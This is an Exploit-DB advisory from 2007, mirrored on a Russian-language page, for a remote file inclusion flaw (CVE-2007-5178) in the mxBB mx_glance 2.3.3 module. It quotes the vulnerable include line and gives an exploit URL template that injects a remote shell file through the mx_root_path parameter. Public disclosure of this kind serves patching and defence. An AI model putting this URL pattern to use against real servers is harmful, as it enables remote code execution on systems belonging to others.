- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4470
- Проверка EDB
- 
	
		
			- Пройдено
 
- Автор
- BD0RK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-5178
- Дата публикации
- 2007-09-29
		Код:
	
		++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                                    +
        +    mxBB Module mx_glance 2.3.3 Remote File Include Vulnerability   +
        +                                                                    +
        +                   Discovered by bd0rk || SOH-Crew                  +
        +                                                                    +
        +                         www.soh-crew.it.tt                         +
        +                                                                    +
        +            The german Coding and IT-Security Ressource             +
        +                                                                    +
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Vendor: http://www.mx-system.com
Download: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=336
Vulnerable Code in contrib/mx_glance_sdesc.php line 89
####################################################################
include_once($mx_root_path . 'includes/mx_functions_tools.'.$phpEx);
####################################################################
[+]Exploit: http://[t4rg3t]/[p4th]/contrib/mx_glance_sdesc.php?mx_root_path=[ShellCode]
Description: The parameter $mx_root_path is not declared before include_once.
Fixtip: Declare the parameter in sourcecode or use hacking attempt.
Greetings: str0ke, TheJT, Bedrik, SkyXNet, Kirsche, Viggy, x0r_32, SecurityFocus
####The 18 years old, german Hacker bd0rk####
Contact: bd0rk[at]hackermail.com
ICQ: 249-613-511
/I am out =)
# milw0rm.com [2007-09-29]- Источник
- www.exploit-db.com
 
 
		